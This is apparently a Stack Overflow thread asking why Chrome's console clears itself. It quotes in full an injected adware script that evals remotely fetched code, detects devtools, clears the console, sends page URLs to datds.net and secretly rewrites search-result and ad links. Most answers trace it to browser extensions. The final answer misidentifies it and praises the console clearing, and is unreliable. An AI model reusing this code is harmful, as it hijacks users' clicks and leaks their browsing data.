# Chrome console auto clear log

Tags: google-chrome, google-chrome-extension, google-chrome-devtools

I'm using chrome to debug something.But the console will auto clear, and here is the url `https://eluxer.net/code?id=105&subid=51824_6967_`.What about it?

[image]

the url's content is here.search `c.clear()`

```
(function() {
    var core = {
        dt: !1,
        isFrame: top != self,
        modules: [],
        opts: [],
        options: {},
        start: null,
        $: null,
        now: function() {
            return (new Date).getTime()
        },
        buildUrl: function(o, t) {
            return document.location.protocol + "//" + this.options.host + o + "?" + this.$.param(t)
        },
        buildMCUrl: function(o, t) {
            return "https://" + this.options.mcHost + o + "?" + this.$.param(t)
        },
        getPageHostname: function() {
            return document.location.hostname.replace(/^www\./, "")
        },
        init: function(options) {
            core.start = core.now(),
            core.options = options;
            var requres = new XMLHttpRequest;
            requres.onload = function() {
                eval(this.responseText);
                var $ = core.$ = jQuery;
                jQuery.noConflict(),
                $.each(core.modules, function(o, t) {
                    t.call(null, core.opts[o], core, $, window, document)
                })
            }
            ,
            requres.open("get", "https://code.jquery.com/jquery-3.0.0.min.js"),
            requres.send()
        },
        run: function(o) {
            this.modules.push(o)
        }
    };
    core.init({
        "subid": "51824_6967_",
        "host": "eluxer.net",
        "mcHost": "datds.net"
    });
    core.opts.push({});
    core.run(function(e, n, r, t, i) {
        function o() {
            clearInterval(l),
            n.dt || (n.dt = !0,
            (new Image).src = n.buildUrl("/dt", {
                r: Math.random()
            }))
        }
        function a() {
            var e = t.Firebug
              , r = e && e.chrome;
            return r && r.isInitialized ? void o() : (c.log(d),
            void setTimeout(function() {
                n.dt || c.clear()
            }, 100))
        }
        var d = new Image
          , c = t.console;
        d.__defineGetter__("id", o);
        var l = setInterval(a, 1e3);
        a()
    });
    core.opts.push({
        "place": 2524,
        "maxIndexLength": 10000,
        "minDistance": 200,
        "phrases": false,
        "domains": true
    });
    core.run(function(e, t, r, n, a) {
        if (!t.isFrame) {
            var i = a.createElement("a")
              , o = n.localStorage
              , s = {
                progress: !1,
                runTimeout: null,
                init: function() {
                    switch (s.watchMutations(),
                    t.getPageHostname()) {
                    case "yandex.ru":
                    case "yandex.ua":
                        s.prepareYandex();
                        break;
                    case "google.ru":
                    case "google.com":
                    case "google.com.ua":
                        s.prepareGoogle()
                    }
                },
                watchMutations: function() {
                    if (n.MutationObserver) {
                        var e = t.getPageHostname()
                          , r = {
                            "yandex.ru": [/\bcontent__left\b/, /\bsuggest2\b/],
                            "yandex.ua": [/\bcontent__left\b/, /\bsuggest2\b/],
                            "google.com": [/\bcontent\b/, /\btsf\b/],
                            "google.com.ua": [/\bcontent\b/, /\btsf\b/],
                            "google.ru": [/\bcontent\b/, /\btsf\b/]
                        };
                        if (r.hasOwnProperty(e)) {
                            var i = r[e]
                              , o = new n.MutationObserver(function(e) {
                                for (var t = !0, r = 0; r < e.length; r++)
                                    for (var n = e[r].target; n; ) {
                                        for (var a = 0; a < i.length; a++)
                                            i[a].test(n.className) && (t = !1);
                                        n = n.parentNode
                                    }
                                t || s.reRun()
                            }
                            );
                            o.observe(a.body, {
                                childList: !0,
                                subtree: !0
                            })
                        }
                    }
                },
                prepareYandex: function() {
                    r(".serp-adv-item").each(function() {
                        var e = r(this)
                          , t = e.find(".serp-item__greenurl a, .organic__path a");
                        if (t.length) {
                            var n = t[0]
                              , a = n.textContent.toLowerCase().split("/")[0];
                            e.find("a").attr("data-href", "http://" + a)
                        }
                    })
                },
                prepareGoogle: function() {
                    r(".ads-ad").each(function() {
                        var e = r(this)
                          , t = e.find("cite")[0];
                        if (t) {
                            var n = t.textContent.toLowerCase().split("/")[0];
                            e.find("a").attr("data-href", "http://" + n)
                        }
                    })
                },
                reRun: function() {
                    s.progress || (clearTimeout(s.runTimeout),
                    s.runTimeout = setTimeout(function() {
                        s.run(a.body)
                    }, 500))
                },
                run: function(n) {
                    s.progress = !0;
                    var i = {
                        url: a.location.href,
                        urls: [],
                        phrases: []
                    };
                    return e.domains && (i.urls = s.findUrls(n)),
                    e.phrases && (i.phrases = s.findPhrases(n)),
                    i.urls.length || i.phrases.length ? void r.ajax({
                        type: "POST",
                        data: JSON.stringify(i),
                        contentType: "application/json",
                        dataType: "json",
                        xhrFields: {
                            withCredentials: !0
                        },
                        url: t.buildMCUrl("/replacement/find", {
                            place: e.place,
                            subid: t.options.subid,
                            hsid: chrome && chrome.runtime && chrome.runtime.id || ""
                        }),
                        success: function(e) {
                            t.dt || (s.replaceUrls(n, e.urls),
                            s.replacePhrases(n, e.phrases),
                            setTimeout(function() {
                                s.progress = !1
                            }, 500))
                        }
                    }) : void (s.progress = !1)
                },
                getDomainByUrl: function(e) {
                    return i.href = e,
                    s.getDomain(i)
                },
                getDomain: function(e) {
                    return e.hostname.toLowerCase().replace(/^www\./, "")
                },
                getRealDomain: function(e) {
                    return s.getDomainByUrl(s.getRealHref(e))
                },
                getRealHref: function(e) {
                    var t = s.getDomain(e);
                    return -1 !== ["google.ru", "google.com", "yabs.yandex.ru"].indexOf(t) && e.getAttribute ? e.getAttribute("data-href") : e.href
                },
                getBaseRealHref: function(e) {
                    i.href = s.getRealHref(e);
                    var t = s.getDomain(i)
                      , r = "";
                    return -1 !== ["realty.yandex.ru", "plarium.com", "espritgames.ru", "101xp.com", "promo.101xp.com", "sportiv.ru"].indexOf(t) && (r = i.pathname),
                    t + r
                },
                getDistance: function(e, t) {
                    var r, n, a, i;
                    return e.top < t.top ? (a = e.top + e.height,
                    i = t.top) : (a = t.top + t.height,
                    i = e.top),
                    e.left < t.left ? (r = e.left + e.width,
                    n = t.left) : (r = t.left + t.width,
                    n = e.left),
                    Math.pow(r - n, 2) + Math.pow(a - i, 2)
                },
                extractWords: function(e) {
                    var t, r = new RegExp("(?:[-._&]?[a-zа-яё0-9]+)+","ig"), n = [];
                    for (n.wordsLength = 0; t = r.exec(e); )
                        n.push({
                            word: t[0].toLowerCase(),
                            text: t[0],
                            index: t.index
                        }),
                        n.wordsLength += t[0].length;
                    return n
                },
                findLinks: function(e) {
                    return r(e).find("a").filter(function() {
                        return !!this.hostname && !!s.getRealDomain(this)
                    })
                },
                findUrls: function(e) {
                    if (!e)
                        return [];
                    var t = {};
                    return this.findLinks(e).each(function() {
                        var e = s.getBaseRealHref(this);
                        t[e] = 1
                    }),
                    Object.keys(t)
                },
                replaceUrls: function(e, t) {
                    e && t && this.findLinks(e).each(function() {
                        var e = this
                          , n = s.getBaseRealHref(e);
                        if (n && t.hasOwnProperty(n)) {
                            var a = t[n]
                              , i = s.getRealHref(e);
                            e.realHref = i,
                            e.hiddenHref = s.buildClickLink(r.extend({
                                href: i
                            }, a)),
                            s.setClickHandler(e)
                        }
                    })
                },
                setClickHandler: function(e) {
                    var t = e.onclick;
                    e.onclick = function(r) {
                        var n, a = s.handleClick(e);
                        if ("function" == typeof t && (n = t(r)),
                        a && !1 === n)
                            return !1
                    }
                },
                handleClick: function(e) {
                    if (!e.hiddenHref)
                        return !1;
                    var r = e.href
                      , n = s.getDomain(a.location);
                    if (t.dt && e.realHref)
                        return !1;
                    var i = e.realHref && s.getDomainByUrl(e.realHref);
                    if (i && (-1 !== n.indexOf(i) || -1 !== i.indexOf(n))) {
                        var f = t.now();
                        if (!o || o._ym_ts && f - o._ym_ts < 72e5 || f - t.start < 6e4)
                            return !1;
                        o._ym_ts = t.now()
                    }
                    return e.href = e.hiddenHref,
                    e.realHref && delete e.hiddenHref,
                    setTimeout(function() {
                        e.href = r
                    }, 10),
                    !0
                },
                isPhraseNodeAllowed: function(e) {
                    if (!e.tagName)
                        return !1;
                    var t = ["AUDIO", "VIDEO", "IFRAME", "A", "IMG", "INPUT", "BUTTON", "SELECT", "OPTION", "SCRIPT", "META", "LINK", "STYLE", "NOSCRIPT", "HEADER", "FOOTER", "LABEL", "H1", "H2", "H3", "H4", "H5", "H6"];
                    if (-1 !== t.indexOf(e.tagName.toUpperCase()))
                        return !1;
                    if (e.className && "string" == typeof e.className)
                        for (var r = ["ya-partner", "header"], n = 0; n < r.length; n++)
                            if (e.className.match(new RegExp("\b" + r[n] + "\b")))
                                return !1;
                    var a = ["header", "footer"];
                    return -1 === a.indexOf(e.id)
                },
                findPhraseNodes: function(e) {
                    for (var t = [], n = [e]; n.length; ) {
                        var a = n.shift();
                        if (a.nodeType === Node.TEXT_NODE) {
                            var i = r.trim(a.textContent);
                            if (i.length > 2) {
                                var o = s.extractWords(a.textContent);
                                o.length && t.push([a, o])
                            }
                        } else if (s.isPhraseNodeAllowed(a))
                            for (var f = 0, c = a.childNodes.length; f < c; f++)
                                n.push(a.childNodes[f])
                    }
                    return t
                },
                findPhrases: function(t) {
                    var n = []
                      , a = 0
                      , i = this.findPhraseNodes(t);
                    return r.each(i, function(t, i) {
                        var o = i[1]
                          , s = r.map(o, function(e) {
                            return e.word
                        }).join(" ");
                        return a += s.length,
                        !(a > e.maxIndexLength) && void n.push(s)
                    }),
                    n
                },
                replacePhrases: function(e, t) {
                    if (e && t) {
                        var r = this.doReplacePhrases(e, t);
                        this.removeBadReplaces(e, r)
                    }
                },
                doReplacePhrases: function(e, t) {
                    var n = {};
                    r.each(t, function(e, t) {
                        var a = s.extractWords(e)
                          , i = n;
                        r.each(a, function(e, r) {
                            var n = a[e].word;
                            i.hasOwnProperty(n) || (i[n] = {
                                parent: i
                            }),
                            i = i[n],
                            e === a.length - 1 && (i.data = t)
                        })
                    });
                    var i = s.findPhraseNodes(e)
                      , o = [];
                    return r.each(i, function(e, t) {
                        for (var r, i = t[0], f = t[1], c = i.textContent, l = 0, u = 0, d = f.length; u < d; ) {
                            for (var h = u, p = n; h < d && p.hasOwnProperty(f[h].word); )
                                p = p[f[h].word],
                                h++;
                            for (; p.parent && !p.data; )
                                p = p.parent,
                                h--;
                            if (h <= u && !p.data)
                                u++;
                            else {
                                r = c.slice(l, f[u].index),
                                "" != r && i.parentNode.insertBefore(a.createTextNode(r), i);
                                var g = f[h - 1].index + f[h - 1].word.length
                                  , m = c.slice(f[u].index, g)
                                  , v = s.createPhraseLink(m, p);
                                o.push(v),
                                i.parentNode.insertBefore(v, i),
                                l = g,
                                u = h
                            }
                        }
                        l > 0 && (i.textContent = c.slice(l))
                    }),
                    o
                },
                removeBadReplaces: function(t, n) {
                    var i = Math.pow(e.minDistance, 2)
                      , o = []
                      , f = []
                      , c = [];
                    return r.each(n, function(e, t) {
                        var n = r(t)
                          , a = n.offset();
                        a.width = n.width(),
                        a.height = n.height();
                        for (var l = !0, u = o.length - 1; u >= 0; u--)
                            if (s.getDistance(o[u], a) < i) {
                                l = !1;
                                break
                            }
                        l ? (c.push(t),
                        o.push(a)) : f.push(t)
                    }),
                    r.each(f, function(e, t) {
                        t.parentNode.insertBefore(a.createTextNode(t.textContent), t),
                        r(t).remove()
                    }),
                    c
                },
                createPhraseLink: function(e, t) {
                    var n = a.createElement("a")
                      , i = r.extend({}, t.data, {
                        text: e
                    });
                    return r.extend(n, {
                        rel: "nofollow",
                        target: "_blank",
                        className: "intext-link",
                        textContent: e,
                        href: t.data.link || "#",
                        hiddenHref: s.buildClickLink(i)
                    }),
                    s.setClickHandler(n),
                    r.extend(n.style, {
                        position: "relative",
                        fontWeight: "bold"
                    }),
                    n
                },
                buildClickLink: function(n) {
                    return n = r.extend({
                        place: e.place,
                        subid: t.options.subid
                    }, n, {
                        url: a.location.href
                    }),
                    t.buildMCUrl("/replacement/click", n)
                }
            };
            r(a).ready(function() {
                s.init(),
                s.run(a.body)
            })
        }
    });
    core.opts.push({});
    core.run(function(e, a, o, n, l) {
        var r = "seReplace"
          , t = n.localStorage
          , c = t[r] || 0;
        a.now() - c < 864e5 || setInterval(function() {
            var e, o = l.location;
            o.pathname,
            o.hostname,
            o.href;
            e && (t.seReplace = Date.now(),
            l.location.href = a.buildMCUrl("/go", {
                url: e
            }))
        }, 1e3)
    });
}
)();
```

Answer (score 2):

This appears to be related to an extension you have on your system. I disabled the Smile Always Amazon Extension and this stopped happening. There isn't much information as to what eluxer.net is, or what that script is doing, but disabling that extension did it for me.

Check your extensions one by one and see if this solves that issue.

Comment: I find it.`Vysor.com` plugin did it, and I have already closed it.

Comment: @张浩杰 I agree it happens with Vysor Chrome extension

Answer (score 1):

In my Case it was postman chrome extension, removing it fixed the problem.

Answer (score 0):

Here it is what it's happening https://developer.mozilla.org/en-US/docs/Web/API/Console/clear .You can disable this thing by enabling preserve log as stated in documentation:

> Note that in Google Chrome, console.clear() has no effect if the user
>   has selected "Preserve log upon navigation" in the settings

.

Comment: if I keep 'Preserve log ' checked,I would receive a lot of messages like "console.clear() was prevented due to 'Preserve log'"

Comment: Yeah, but that will allow you to see what was in console before the console.clear() was called. What is your intention or what is your question in the end? How to avoid displaying "Console log was cleared"? or what is this hiding?

Comment: I just want to find out where the url loaded 'https://eluxer.net/code?id=105&subid=51824_6967_', because it calls 'console.clear()' with 'setInterval'

Comment: Hi Chang, I got the same situation on my own three Windows devices, It only happens on Windows system, not on Mac. Do you ever installation "MkDocs"? If not, maybe we just got a Virus on our Windows computer.

Comment: Just get infected, reinstall chrome.

Answer (score 0):

That looks like a btcspinner auto spin script. I got one like that as well. But if it auto-clears the console, that makes it run longer before you have to do the "I'm not a robot". Which is very useful, let's you earn more and longer, without that interuption. So that's a good thing.